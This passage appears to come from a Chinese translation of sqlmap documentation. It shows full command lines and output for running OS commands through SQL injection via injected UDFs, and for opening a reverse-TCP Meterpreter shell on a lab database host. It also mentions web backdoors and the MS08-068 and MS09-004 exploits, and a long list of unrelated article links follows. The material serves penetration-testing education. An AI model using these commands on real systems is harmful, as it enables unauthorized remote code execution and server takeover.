       
        20 
        [hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes,  
       
        21 
        same size as the local file '/software/nc.exe.packed'

运行任意操作系统命令

参数：–os-cmd,–os-shell

当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前用户有权限使用特定的函数。

在MySQL、PostgreSQL，sqlmap上传一个二进制库，包含用户自定义的函数，sys_exec()和sys_eval()。

那么他创建的这两个函数可以执行系统命令。在Microsoft SQL Server，sqlmap将会使用xp_cmdshell存储过程，如果被禁（在Microsoft SQL Server 2005及以上版本默认止），sqlmap会重新启用它，如果不存在，会自动创建。

列举一个PostgreSQL的例子：

 
        01 
        $ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1"  
       
        02 
        --os-cmd id -v 1 
       
        03 
          
        04 
        [...] 
       
        05 
        web application technology: PHP 5.2.6, Apache 2.2.9 
       
        06 
        back-end DBMS: PostgreSQL 
       
        07 
        [hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system 
       
        08 
        [hh:mm:12] [INFO] the back-end DBMS operating system is Linux 
       
        09 
        [hh:mm:12] [INFO] testing if current user is DBA 
       
        10 
        [hh:mm:12] [INFO] detecting back-end DBMS version from its banner 
       
        11 
        [hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist 
       
        12 
        [hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist 
       
        13 
        [hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file 
       
        14 
        [hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file 
       
        15 
        do you want to retrieve the command standard output? [Y/n/a] y 
       
        16 
        command standard output:    'uid=104(postgres) gid=106(postgres) groups=106(postgres)' 
       
        17 
          
        18 
        [hh:mm:19] [INFO] cleaning up the database management system 
       
        19 
        do you want to remove UDF 'sys_eval'? [Y/n] y 
       
        20 
        do you want to remove UDF 'sys_exec'? [Y/n] y 
       
        21 
        [hh:mm:23] [INFO] database management system cleanup finished 
       
        22 
        [hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can  
       
        23 
        only be deleted manually

用–os-shell参数也可以模拟一个真实的shell，可以输入你想执行的命令。

当不能执行多语句的时候（比如php或者asp的后端数据库为MySQL时），仍然可能使用INTO OUTFILE写进可写目录，来创建一个web后门。支持的语言：

Meterpreter配合使用

参数：–os-pwn,–os-smbrelay,–os-bof,–priv-esc,–msf-path,–tmp-path

当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前用户有权限使用特定的函数，可以在数据库与攻击者直接建立TCP连接，这个连接可以是一个交互式命令行的Meterpreter会话，sqlmap根据Metasploit生成shellcode，并有四种方式执行它：

 
        1 
        1、通过用户自定义的sys_bineval()函数在内存中执行Metasplit的shellcode，支持MySQL和PostgreSQL数据库，参数：--os-pwn。 
       
        2 
        2、通过用户自定义的函数上传一个独立的payload执行，MySQL和PostgreSQL的sys_exec()函数，Microsoft SQL Server的xp_cmdshell()函数，参数：--os-pwn。 
       
        3 
        3、通过SMB攻击(MS08-068)来执行Metasploit的shellcode，当sqlmap获取到的权限足够高的时候（Linux/Unix的uid=0，Windows是Administrator），--os-smbrelay。 
       
        4 
        4、通过溢出Microsoft SQL Server 2000和2005的sp_replwritetovarbin存储过程(MS09-004)，在内存中执行Metasploit的payload，参数：--os-bof

列举一个MySQL例子：

      view source 
    
        01 
        $ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn --msf-path /software/metasploit 
       
        02 
          
        03 
        [...] 
       
        04 
        [hh:mm:31] [INFO] the back-end DBMS is MySQL 
       
        05 
        web server operating system: Windows 2003 
       
        06 
        web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0 
       
        07 
        back-end DBMS: MySQL 5.0 
       
        08 
        [hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system 
       
        09 
        [hh:mm:31] [INFO] the back-end DBMS operating system is Windows 
       
        10 
        how do you want to establish the tunnel? 
       
        11 
        [1] TCP: Metasploit Framework (default) 
       
        12 
        [2] ICMP: icmpsh - ICMP tunneling 
       
        13 
        >  
       
        14 
        [hh:mm:32] [INFO] testing if current user is DBA 
       
        15 
        [hh:mm:32] [INFO] fetching current user 
       
        16 
        what is the back-end database management system architecture? 
       
        17 
        [1] 32-bit (default) 
       
        18 
        [2] 64-bit 
       
        19 
        >  
       
        20 
        [hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist 
       
        21 
        [hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist 
       
        22 
        [hh:mm:33] [INFO] detecting back-end DBMS version from its banner 
       
        23 
        [hh:mm:33] [INFO] retrieving MySQL base directory absolute path 
       
        24 
        [hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file 
       
        25 
        [hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file 
       
        26 
        how do you want to execute the Metasploit shellcode on the back-end database underlying  
       
        27 
        operating system? 
       
        28 
        [1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default) 
       
        29 
        [2] Stand-alone payload stager (file system way) 
       
        30 
        >  
       
        31 
        [hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode  
       
        32 
        which connection type do you want to use? 
       
        33 
        [1] Reverse TCP: Connect back from the database host to this machine (default) 
       
        34 
        [2] Reverse TCP: Try to connect back from the database host to this machine, on all ports  
       
        35 
        between the specified and 65535 
       
        36 
        [3] Bind TCP: Listen on the database host for a connection 
       
        37 
        >  
       
        38 
        which is the local address? [192.168.136.1]  
       
        39 
        which local port number do you want to use? [60641]  
       
        40 
        which payload do you want to use? 
       
        41 
        [1] Meterpreter (default) 
       
        42 
        [2] Shell 
       
        43 
        [3] VNC 
       
        44 
        >  
       
        45 
        [hh:mm:40] [INFO] creation in progress ... done 
       
        46 
        [hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait.. 
       
        47 
          
        48 
                                        _ 
       
        49 
                                        | |      o 
       
        50 
        _  _  _    _ _|_  __,   ,    _  | |  __    _|_ 
       
        51 
        / |/ |/ |  |/  |  /  |  / _|/ _|/  /  _|  | 
       
        52 
        |  |  |_/|__/|_/_/|_/ / |__/ |__/__/ |_/|_/ 
       
        53 
                                /| 
       
        54 
                                | 
       
        55 
          
        56 
            =[ metasploit v3.7.0-dev [core:3.7 api:1.0] 
       
        57 
        + -- --=[ 674 exploits - 351 auxiliary 
       
        58 
        + -- --=[ 217 payloads - 27 encoders - 8 nops 
       
        59 
            =[ svn r12272 updated 4 days ago (2011.04.07) 
       
        60 
          
        61 
        PAYLOAD => windows/meterpreter/reverse_tcp 
       
        62 
        EXITFUNC => thread 
       
        63 
        LPORT => 60641 
       
        64 
        LHOST => 192.168.136.1 
       
        65 
        [*] Started reverse handler on 192.168.136.1:60641  
       
        66 
        [*] Starting the payload handler... 
       
        67 
        [hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval',  
       
        68 
        please wait.. 
       
        69 
        [*] Sending stage (749056 bytes) to 192.168.136.129 
       
        70 
        [*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) at Mon Apr 11  
       
        71 
        hh:mm:52 +0100 2011 
       
        72 
          
        73 
        meterpreter > Loading extension espia...success. 
       
        74 
        meterpreter > Loading extension incognito...success. 
       
        75 
        meterpreter > [-] The 'priv' extension has already been loaded. 
       
        76 
        meterpreter > Loading extension sniffer...success. 
       
        77 
        meterpreter > System Language : en_US 
       
        78 
        OS              : Windows .NET Server (Build 3790, Service Pack 2). 
       
        79 
        Computer        : W2K3R2 
       
        80 
        Architecture    : x86 
       
        81 
        Meterpreter     : x86/win32 
       
        82 
        meterpreter > Server username: NT AUTHORITYSYSTEM 
       
        83 
        meterpreter > ipconfig 
       
        84 
          
        85 
        MS TCP Loopback interface 
       
        86 
        Hardware MAC: 00:00:00:00:00:00 
       
        87 
        IP Address  : 127.0.0.1 
       
        88 
        Netmask     : 255.0.0.0 
       
        89 
          
        90 
        Intel(R) PRO/1000 MT Network Connection 
       
        91 
        Hardware MAC: 00:0c:29:fc:79:39 
       
        92 
        IP Address  : 192.168.136.129 
       
        93 
        Netmask     : 255.255.255.0 
       
        94 
          
        95 
        meterpreter > exit 
       
        96 
          
        97 
        [*] Meterpreter session 1 closed.  Reason: User exit

默认情况下MySQL在Windows上以SYSTEM权限运行，PostgreSQL在Windows与Linux中是低权限运行，Microsoft SQL Server 2000默认是以SYSTEM权限运行，Microsoft SQL Server 2005与2008大部分是以NETWORK SERVICE有时是LOCAL SERVICE。

你可能感兴趣的:(数据库相关)

MySQL 数据库：原理、应用与发展专家大圣数据库数据库 mysql
摘要：本文深入探讨了MySQL数据库相关内容。首先介绍了MySQL作为开源关系型数据库管理系统的显著特点，包括易用性、跨平台性、高性能、可扩展性、开源免费以及数据安全性等方面。接着详细阐述了其安装与配置过程，涵盖在不同操作系统上的安装方式、配置文件参数的含义与设置，以及字符集和校对规则的设定。文中进一步讲解了MySQL的基本概念，如数据库与表的构成、多种数据类型、不同索引类型的特点与应用场景。并对
使用java代码实现操作数据库的创建等系列操作两点王爷数据库 java oracle
创作背景：使用代码实现对PostgreSQL数据库的创建用户、授权用户、删除用户系列操作！1、导入相关的依赖org.projectlomboklombokcn.hutoolhutool-all5.8.262、具体实现创建实体类@Data@ApiModel(value="EntityDataBase",description="实体数据库相关内容")publicclassEntityDataBase
mysql怎么把utf8mb4_unicode_ci转为utf8mb4_general_ci 我是杨天 mysql ci/cd oracle 数据库
数据库相关学习资料：https://edu.51cto.com/video/655.htmlMySQL字符集转换方案：从utf8mb4_unicode_ci到utf8mb4_general_ci在MySQL数据库中，字符集和排序规则对于数据的存储和检索具有重要影响。utf8mb4_unicode_ci和utf8mb4_general_ci是两种常见的utf8mb4字符集的排序规则。其中，utf8m
Qt 数据库相关操作 QSqlDatabase、QSqlError、QSqlIndex、QSqlQuery等等 Verdure陌矣 Qt 数据库 qt oracle qt5 经验分享 sql
摘要：这一篇Qt博文主要介绍在Qt开发中针对数据库相关开发时可以用到或参考的一些数据库类，例如显示数据库的数据通常涉及到几个关键组件，包括数据库连接、查询执行以及用户界面元素的更新等等，这些类的作用是什么，大致应该怎么用，类的常用类方法及相关需要注意的事项等等，更多更加细致的需根据类名查找翻阅官方帮助文档。QT提供的与数据库操作相关的类有以下几个：QSqlDatabase：这个类用于处理与数据
Mysql学习笔记凉风有信2020
第一次亲密接触一、数据库相关概念：①、数据库的好处：1、持久化数据到本地2、使用数据库管理软件进行结构化查询②、数据库常见概念1、DB：数据库，存储数据的容器2、DBMS：数据库管理系统（数据库软件、数据库产品）3、SQL：结构化数据查询语言，不是某个数据库特有的查询语言，而是几乎所有的结构化数据库通用的语言。③、数据库存储数据的特点1、数据存放到表中，表再放到库中2、一个库可以有多张表。每个表拥
开发一个电商API能有多简单！一篇文章告诉你咸鱼蛋炒饭学习分享数据库
以下是开发一个简单电商API的主要步骤：一、需求分析与规划确定电商API需要提供的功能，如商品查询、商品详情获取、用户注册/登录、购物车管理、订单创建与查询等。二、技术选型与环境搭建选择合适的开发语言和框架，例如使用Python的Django或Flask框架。假设选择Flask：plaintextpipinstallflask同时，安装数据库相关的库，比如SQLAlchemy（用于与数据库交互）：
TeamTalk消息服务器（群组相关） jack学编程 Teamtalk 服务器 c++mysql 后端 redis
具体的流程如下介绍，后续需要着重研究数据库相关表的结构设计。群组信令和协议设计enumGroupCmdID{CID_GROUP_NORMAL_LIST_REQUEST=1025,CID_GROUP_NORMAL_LIST_RESPONSE=1026,CID_GROUP_INFO_REQUEST=1027,CID_GROUP_INFO_RESPONSE=1028,//......暂时省略无关信令};
数据库基本概述 Cyzhouke
一、数据库基础知识1、数据库相关的基本概念1.1、数据描述事物的符号记录称为数据，对数据含义的说明称为数据的语义。1.2、数据库数据库是指长期存储在计算机内的、有组织的、可共享的数据集合。1.3、数据库管理系统数据库管理系统(DBMS)是位于操作系统与用户之间的一层数据管理软件，是数据库系统的核心。DBMS按照一定的数据模型科学地组织和存储数据，能够高效地获取数据，提供安全性和完整性等统一控制机制
【django学习】——Django介绍和实战（开发简易版博客网页）额无语面试学习路线阿里巴巴 django python 学习数据库 sql
目录0、视频链接?1、环境配置?2、django基本命令1）常见命令?2）数据库相关的Django命令?3、Django项目1）Django创建项目?2）项目目录介绍3）运行初始化的Django项目?4、Django应用1）Django项目和Django应用?2）Django应用目录（1）创建Django应用（2）应用目录各文件介绍?问题1：视图、路由、模型是什么意思？5、Django视图&Dja
JDBC的概念 2301_79744036 数据库 java
一.JDBC概念：其实JDBC就像是翻译官，就像是你去到国外是不是听不懂当地人再讲什么？Java就相当于是你，数据库就是本地人，然后JDBC就是那个翻译官，它提供了一套标准的方法和工具，让Java程序可以与各种不同类型的数据库进行交流，无论是MySQL、Oracle、SQLServer还是其他类型的数据库。它隐藏了与具体数据库相关的细节，使得Java程序员可以用相同的方式来访问不同的数据库，而不需
FastAPI 之自动化测试数据库接口 somenzz 数据库单元测试 python java mysql
今天的文章分享如下在FastAPI框架下，使用pytest来自动化测试数据库相关的接口，文章的最后给出全部代码。最近越来越喜欢使用FastAPI来写后端服务了，因为它是Python领域性能最好的Web框架，它专注于提供高性能的WebAPI，其他方面并不限制你的手脚，可以随意使用你喜欢的三方库，这点类似于Flask，可以量身定制你的后端架构，以满足自己的需求。需要说明的是，后端服务基本是离不开关系型
JavaWEB01：MySQL基础——数据库相关概念、MySQL安装和配置、基础的SQL语句 XXXZhy JavaWEB mysql sql 后端
JavaWEB01：MySQL基础——数据库相关概念、MySQL安装和配置、基本的SQL语句JavaWEB02：MySQL高级——约束、数据库设计、多表查询、事务JavaWEB03：JDBCJavaWEB04：MavenJavaWEB05：MybatisJavaWEB06：Mybatis综合练习JavaWeb作业文章目录1，数据库相关概念1.1数据库1.2数据库管理系统1.3常见的数据库管理系统1
JavaWeb学习笔记（一）数据库概念、MySQL配置、SQL分类 Intention：数据库 sql mysql
JavaWeb学习笔记（一）JavaWeb介绍1.网页：展现数据2.数据库：存储和管理数据3.JavaWeb程序：逻辑处理数据库数据库相关概念数据库存储数据的仓库，数据是有组织的进行存储英文：DataBase，简称DB数据库管理系统管理数据库的大型软件英文：DataBaseManagementSystem，简称DBMSSQL英文：StructuredQueryLanguage，简称SQL，结构化查
JavaWeb学习（1）数据库相关概念，mysql数据库管理系统，SQL语句 Flyoungbuhu 学习数据库
数据库相关概念数据库：存储数据的仓库，数据是有组织的进行存储英文：DataBase简称DB数据库管理系统：管理数据库的大型软件英文：DataBaseManagementSystem,简称DBMSSQL英文：StrycturedQueryLaguage，简称SQL，结构化查询语言操作关系型数据库的编程语言定义操作所有关系型数据库的统一标准安装Mysql数据库1.下载官网mysql数据库下载下载完成后
软考——01 数据库基础三点水滴
软件设计师考试——数据库基础部分思维导图database.png概述首先是数据库相关的一些概念数据库（DB）、数据库管理员（DBA）、数据库管理系统（DBMS）三级模式外模式，也称为“用户模式”或“子模式”。可以理解为数据库系统对用户暴露出来的部分，用户对数据进行的基本操作，增删改查都是在这个层次进行；概念模式，也称为“模式”。可以理解为逻辑上的数据，更多的是反映人的思维和对显示数据的抽象；内模式
@Repository、@Component、@Service、@Controller之间的区别与联系初心myp
@Repository、@Component、@Service、@Controller这些注解使我们开发过程中比较常用的一些注解，今天我们就一起了解一下他们之间的区别与联系。原文官网引用:在Spring2.0之前的版本中，@Repository注解可以标记在任何的类上，用来表明该类是用来执行与数据库相关的操作（即dao对象），并支持自动处理数据库操作产生的异常在Spring2.5版本中，引入了更多
Postgresql常用命令小白--AI postgresql oracle 数据库
1、连接数据库,默认的用户和数据库是postgrespsql-hIP地址-p端口-U数据库名2、创建数据库命令createdb[option…][dbname[description]]dbname:数据库名description：关于新创建的数据库相关的说明options：参数3、访问数据库1、列举数据库：\l2、选择数据库：\c数据库名3、查看该某个库中的所有表：\dt4、切换数据库：\cin
OpenVPN 高级管理 Toasten #OpenVPN OpenVPN
重点：一键安装OpenVPN脚本后续管理：证书吊销。给新用户颁发证书关系型数据库相关概念三个范式1）OpenVPN高级管理本节介绍OpenVPN的高级功能，主要关于安全加强及客户端的管理功能，比如：员工入职、离职涉及到的创建账户与吊销账户证书。1.1）启用安全增强功能启用防止DOS攻击的安全增强配置//生成ta.key("安全增强配置")[root@open-server~]open--genke
OpenVPN 介绍 Toasten #OpenVPN OpenVPN
重点：一键安装OpenVPN脚本后续管理：证书吊销。给新用户颁发证书关系型数据库相关概念三个范式1）OpenVPN简介1.1）VPN介绍专用网络：专用网就是在两个网络（例如，北京和广州）之间架设一条专用线路，但是它并不需要真正地去铺设光缆之类的物理线路。虽然没有亲自去铺设，但是需要向电信运营商申请租用专线，在这条专用的线路上只传输自己的信息，所以安全稳定，同时也费用高昂。VPN：VirtualPr
MySQL 基础知识（一）之数据库和 SQL 概述花落随风轻飘舞 MySQL 数据库 mysql sql
目录1数据库相关概念2数据库的结构3SQL概要4SQL的基本书写规则1数据库相关概念数据库是将大量的数据保存起来，通过计算机加工而成的可以进行高效访问的数据集合数据库管理系统（DBMS）是用来管理数据库的计算机系统，通过使用DBMS，多个用户可以安全、简单地操作大量数据关系数据库通过关系数据库管理系统（RDBMS）进行管理2数据库的结构RDBMS通常使用客户端/服务端这样的系统架构，通过客户端向服
c++ Qt 数据库操作满山的猴子我的腚最红 qt 数据库 c++qt 开发语言
1、准备工作Qt本身并没有数据库功能，但是Qt支持调用其他主流的数据库产品，并且这些数据库产品统一了Qt的接口，实际上是一种数据库的中间件。Qt支持以下数据库类型：嵌入式常用的数据库是sqlite3，本体只有几兆大小。非常适合集成到嵌入式产品中，在Qt5版本及以上也集成了SQLite数据库。因此可以直接通过驱动名称连接SQLite。数据库编程中需要用到以下几个类：QSqlDatabase数据库相关
数据库搭建参考资料合集小潤澤
数据库相关数据库接口sqlalchemy：https://www.sqlalchemy.org/数据库postgresql：https://www.postgresql.org/installpostgresql：https://www.cnblogs.com/zhangpengshou/p/5464610.html数据库的三大范式知乎：如何解释关系数据库的第一第二第三范式？这个的答案写的很好ht
全国计算机等级考试二级，MySQL数据库考试大纲（2023年版）我的Python教程计算机等级考试大纲数据库 mysql
基本要求：1.掌握数据库的基本概念和方法。2.熟练掌握MySQL的安装与配置。3.熟练掌握MySQL平台下使用ＳＱＬ语言实现数据库的交互操作。4.熟练掌握MySQL的数据库编程。5.熟悉PHP应用开发语言，初步具备利用该语言进行简单应用系统开发的能力。6.掌握MySQL数据库的管理与维护技术。考试内容一、基本概念与方法1.数据库基础知识（1）数据库相关的基本概念（2）数据库系统的特点与结构（3）数
关系型数据库相关知识 Hiper
关系型数据库和非关系型数据库的区别在关系型数据库中，数据存储于一张张固定行列的表中；而非关系型数据库中，数据有文档、键值对、图、宽列等多种存储方式。MySQL数据库MyISAM和InnoDB存储引擎的区别MyISAM只能支持表级锁，InnoDB可以支持行级锁和MVCC；MyISAM不支持事务，InnoDB支持事务；MyISAM不支持数据库异常崩溃后安全恢复，InnoDB支持；索引实现不一样；Inn
7、JDBC-使用Druid连接数据库 Distant Blue 数据库基础数据库 sql java
使用Druid连接数据库相关文件已上传，自行下载。为什么使用数据库连接池：【1】避免频繁的创建和销毁数据库连接，提高了支援利用率和时间效率【2】每个数据库连接是可以被多次使用，提高了数据库连接的利用率但是在实际开发中一般不需要我们编写，在框架底层会自动实现。privatestaticvoidmethod3()throwsException{Scannerscanner=newScanner(Sys
【MySQL】-15 MySQL综合-1（数据库概念+数据库涉及技术） yinying293 SQL mysql
一数据库的概念本节介绍数据库的基本概念，包括数据库存储方式、数据库技术的发展历史、数据库的存储结构以及数据库在开发中的作用。1.1数据存储方式计算机数据（Data）的存储一般以硬盘为数据存储空间资源，从而保证计算机内的数据能够持续保存。对于数据的处理，一般会采用数据库相关的技术进行处理，从而保证数据处理的高效性。采用数据库的管理模式不仅提高了数据的存储效率，而且在存储的层面上提高了数据的安全性。通
你真的懂数据库的隔离级别吗？不懂请进 Java老程
哎呀妈，又是数据库的隔离级别，大家都要听吐了，每次面试或者和数据库相关的技术分享总会提到数据库的隔离级别，大家真的搞清楚了吗，每种隔离级别都有什么特点，我们该如何选择合适的事物隔离级别。（本文仅针对MySQL数据库介绍）1MySQL的事物隔离级别是为了解决什么问题？事物隔离级别是为了解决事物并发问题。事物并发问题其实就和我们在编写并发程序时的线程安全问题是类似的，线程安全问题是多个线程同时修改了一
MAC电脑如何使用python 连接oracle数据库慧很可爱呦 python oracle macos
与Windows系统相比，Macos系统连接数据库似乎要复杂一些1.在python中导入oracle数据库相关的第三方库importcx_Oracle一开始我简单的以为安装好第三方库就可以了于是，我进行了接下来的数据库查询conn=cx_Oracle.connect('username/password@localhost:端口/servicename')cur=conn.cursor()dic=
mysql入门：ddl，dml，dql，dcl语句基本操作介绍 awofe mysql mysql 数据库 sql
mysql入门数据库相关概念介绍什么是数据库sql语句简介sql语句分类：ddl语句：ddl:数据库库的创建查找：ddl:数据库查询数据库创建ddl：数据库删除ddl:数据库表的操作ddl表操作：查询ddl表操作——创建mysql数据类型ddl表——修改dml语句dml介绍：insert给表中添加数据updata修改数据delete删除数据dql语句：dql介绍查询关键字：基本查询分类：设置别名去
LLM少样本示例的上下文学习在Text-to-SQL任务中的探索 Q同学的nlp笔记 sql 数据库论文阅读人工智能 nlp 深度学习自然语言处理
导语本文探索了如何通过各种提示设计策略，来增强大型语言模型（LLMs）在Few-shotIn-contextLearning中的文本到SQL转换能力。通过使用示例SQL查询的句法结构来检索演示示例，并选择同时追求多样性和相似性的示例可以提高性能，同时，LLMs也从与数据库相关的知识增强中受益。会议：EMNLP2023Findings标题：EnhancingFew-shotText-to-SQLCa
java的(PO,VO,TO,BO,DAO,POJO) Cb123456 VO TO BO POJO DAO
转: http://www.cnblogs.com/yxnchinahlj/archive/2012/02/24/2366110.html ------------------------------------------------------------------- O/R Mapping 是 Object Relational Mapping（对象关系映
spring ioc原理（看完后大家可以自己写一个spring） aijuans spring
最近，买了本Spring入门书：spring In Action 。大致浏览了下感觉还不错。就是入门了点。Manning的书还是不错的，我虽然不像哪些只看Manning书的人那样专注于Manning,但怀着崇敬的心情和激情通览了一遍。又一次接受了IOC 、DI、AOP等Spring核心概念。先就IOC和DI谈一点我的看法。IO
MyEclipse 2014中Customize Persperctive设置无效的解决方法 Kai_Ge MyEclipse2014
高高兴兴下载个MyEclipse2014，发现工具条上多了个手机开发的按钮，心生不爽就想弄掉他！结果发现Customize Persperctive失效！！有说更新下就好了，可是国内Myeclipse访问不了，何谈更新... so~这里提供了更新后的一下jar包，给大家使用！ 1、将9个jar复制到myeclipse安装目录\plugins中 2、删除和这9个jar同包名但是版本号较
SpringMvc上传 120153216 springMVC
@RequestMapping(value = WebUrlConstant.UPLOADFILE) @ResponseBody public Map<String, Object> uploadFile(HttpServletRequest request,HttpServletResponse httpresponse) { try { //
Javascript----HTML DOM 事件何必如此 JavaScript html Web
HTML DOM 事件允许Javascript在HTML文档元素中注册不同事件处理程序。事件通常与函数结合使用，函数不会在事件发生前被执行！注：DOM：指明使用的 DOM 属性级别。 1.鼠标事件属性
动态绑定和删除onclick事件 357029540 JavaScript jquery
因为对JQUERY和JS的动态绑定事件的不熟悉，今天花了好久的时间才把动态绑定和删除onclick事件搞定!现在分享下我的过程。在我的查询页面，我将我的onclick事件绑定到了tr标签上同时传入当前行(this值)参数，这样可以在点击行上的任意地方时可以选中checkbox，但是在我的某一列上也有一个onclick事件是用于下载附件的，当
HttpClient|HttpClient请求详解 7454103 apache 应用服务器网络协议网络应用 Security
HttpClient 是 Apache Jakarta Common 下的子项目，可以用来提供高效的、最新的、功能丰富的支持 HTTP 协议的客户端编程工具包，并且它支持 HTTP 协议最新的版本和建议。本文首先介绍 HTTPClient，然后根据作者实际工作经验给出了一些常见问题的解决方法。HTTP 协议可能是现在 Internet 上使用得最多、最重要的协议了，越来越多的 Java 应用程序需
递归逐层统计树形结构数据 darkranger 数据结构
将集合递归获取树形结构: /** * * 递归获取数据 * @param alist:所有分类 * @param subjname:对应统计的项目名称 * @param pk:对应项目主键 * @param reportList: 最后统计的结果集 * @param count:项目级别 */ public void getReportVO(Arr
访问WEB-INF下使用frameset标签页面出错的原因 aijuans struts2
<frameset rows="61,*,24" cols="*" framespacing="0" frameborder="no" border="0">
MAVEN常用命令 avords
Maven库： http://repo2.maven.org/maven2/ Maven依赖查询： http://mvnrepository.com/ Maven常用命令： 1. 创建Maven的普通java项目： mvn archetype:create -DgroupId=packageName
PHP如果自带一个小型的web服务器就好了 houxinyou apache 应用服务器 Web PHP 脚本
最近单位用PHP做网站，感觉PHP挺好的，不过有一些地方不太习惯，比如，环境搭建。PHP本身就是一个网站后台脚本，但用PHP做程序时还要下载apache，配置起来也不太很方便，虽然有好多配置好的apache+php+mysq的环境，但用起来总是心里不太舒服，因为我要的只是一个开发环境，如果是真实的运行环境，下个apahe也无所谓，但只是一个开发环境，总有一种杀鸡用牛刀的感觉。如果php自己的程序中
NoSQL数据库之Redis数据库管理(list类型) bijian1013 redis 数据库 NoSQL
3.list类型及操作 List是一个链表结构，主要功能是push、pop、获取一个范围的所有值等等，操作key理解为链表的名字。Redis的list类型其实就是一个每个子元素都是string类型的双向链表。我们可以通过push、pop操作从链表的头部或者尾部添加删除元素，这样list既可以作为栈，又可以作为队列。 &nbs
谁在用Hadoop？ bingyingao hadoop 数据挖掘公司应用场景
Hadoop技术的应用已经十分广泛了，而我是最近才开始对它有所了解，它在大数据领域的出色表现也让我产生了兴趣。浏览了他的官网，其中有一个页面专门介绍目前世界上有哪些公司在用Hadoop，这些公司涵盖各行各业，不乏一些大公司如alibaba,ebay,amazon,google,facebook,adobe等，主要用于日志分析、数据挖掘、机器学习、构建索引、业务报表等场景,这更加激发了学习它的热情。
【Spark七十六】Spark计算结果存到MySQL bit1129 mysql
package spark.examples.db import java.sql.{PreparedStatement, Connection, DriverManager} import com.mysql.jdbc.Driver import org.apache.spark.{SparkContext, SparkConf} object SparkMySQLInteg
Scala: JVM上的函数编程 bookjovi scala erlang haskell
说Scala是JVM上的函数编程一点也不为过，Scala把面向对象和函数型编程这两种主流编程范式结合了起来，对于熟悉各种编程范式的人而言Scala并没有带来太多革新的编程思想，scala主要的有点在于Java庞大的package优势，这样也就弥补了JVM平台上函数型编程的缺失，MS家.net上已经有了F#，JVM怎么能不跟上呢？对本人而言
jar打成exe bro_feng java jar exe
今天要把jar包打成exe，jsmooth和exe4j都用了。遇见几个问题。记录一下。两个软件都很好使，网上都有图片教程，都挺不错。首先肯定是要用自己的jre的，不然不能通用，其次别忘了把需要的lib放到classPath中。困扰我很久的一个问题是，我自己打包成功后，在一个同事的没有装jdk的电脑上运行，就是不行，报错jvm.dll为无效的windows映像，如截图最后发现
读《研磨设计模式》-代码笔记-策略模式-Strategy bylijinnan java 设计模式
声明：本文只为方便我个人查阅和理解，详细的分析以及源代码请移步原作者的博客http://chjavach.iteye.com/ /* 策略模式定义了一系列的算法，并将每一个算法封装起来，而且使它们还可以相互替换。策略模式让算法独立于使用它的客户而独立变化简单理解： 1、将不同的策略提炼出一个共同接口。这是容易的，因为不同的策略，只是算法不同，需要传递的参数
cmd命令值cvfM命令 chenyu19891124 cmd
cmd命令还真是强大啊。今天发现jar -cvfM aa.rar @aaalist 就这行命令可以根据aaalist取出相应的文件例如：在d：\workspace\prpall\test.java 有这样一个文件，现在想要将这个文件打成一个包。运行如下命令即可比如在d：\wor
OpenJWeb(1.8) Java Web应用快速开发平台 comsci java 框架 Web 项目管理企业应用
OpenJWeb(1.8) Java Web应用快速开发平台的作者是我们技术联盟的成员，他最近推出了新版本的快速应用开发平台 OpenJWeb(1.8)，我帮他做做宣传 OpenJWeb快速开发平台以快速开发为核心，整合先进的java 开源框架，本着自主开发+应用集成相结合的原则，旨在为政府、企事业单位、软件公司等平台用户提供一个架构透
Python 报错：IndentationError: unexpected indent daizj python tab 空格缩进
IndentationError: unexpected indent 是缩进的问题，也有可能是tab和空格混用啦 Python开发者有意让违反了缩进规则的程序不能通过编译，以此来强制程序员养成良好的编程习惯。并且在Python语言里，缩进而非花括号或者某种关键字，被用于表示语句块的开始和退出。增加缩进表示语句块的开
HttpClient 超时设置 dongwei_6688 httpclient
HttpClient中的超时设置包含两个部分： 1. 建立连接超时，是指在httpclient客户端和服务器端建立连接过程中允许的最大等待时间 2. 读取数据超时，是指在建立连接后，等待读取服务器端的响应数据时允许的最大等待时间在HttpClient 4.x中如下设置： HttpClient httpclient = new DefaultHttpC
小鱼与波浪 dcj3sjt126com
一条小鱼游出水面看蓝天，偶然间遇到了波浪。　　小鱼便与波浪在海面上游戏，随着波浪上下起伏、汹涌前进。　　小鱼在波浪里兴奋得大叫：“你每天都过着这么刺激的生活吗？简直太棒了。”　　波浪说：“岂只每天过这样的生活，几乎每一刻都这么刺激！还有更刺激的，要有潮汐变化，或者狂风暴雨，那才是兴奋得心脏都会跳出来。”　　小鱼说：“真希望我也能变成一个波浪，每天随着风雨、潮汐流动，不知道有多么好！”　　很快，小鱼
Error Code: 1175 You are using safe update mode and you tried to update a table dcj3sjt126com mysql
快速高效用：SET SQL_SAFE_UPDATES = 0；下面的就不要看了！今日用MySQL Workbench进行数据库的管理更新时，执行一个更新的语句碰到以下错误提示： Error Code: 1175 You are using safe update mode and you tried to update a table without a WHERE that
枚举类型详细介绍及方法定义 gaomysion enum javaee
转发 http://developer.51cto.com/art/201107/275031.htm 枚举其实就是一种类型，跟int, char 这种差不多，就是定义变量时限制输入的，你只能够赋enum里面规定的值。建议大家可以看看，这两篇文章，《java枚举类型入门》和《C++的中的结构体和枚举》，供大家参考。枚举类型是JDK5.0的新特征。Sun引进了一个全新的关键字enum
Merge Sorted Array hcx2013 array
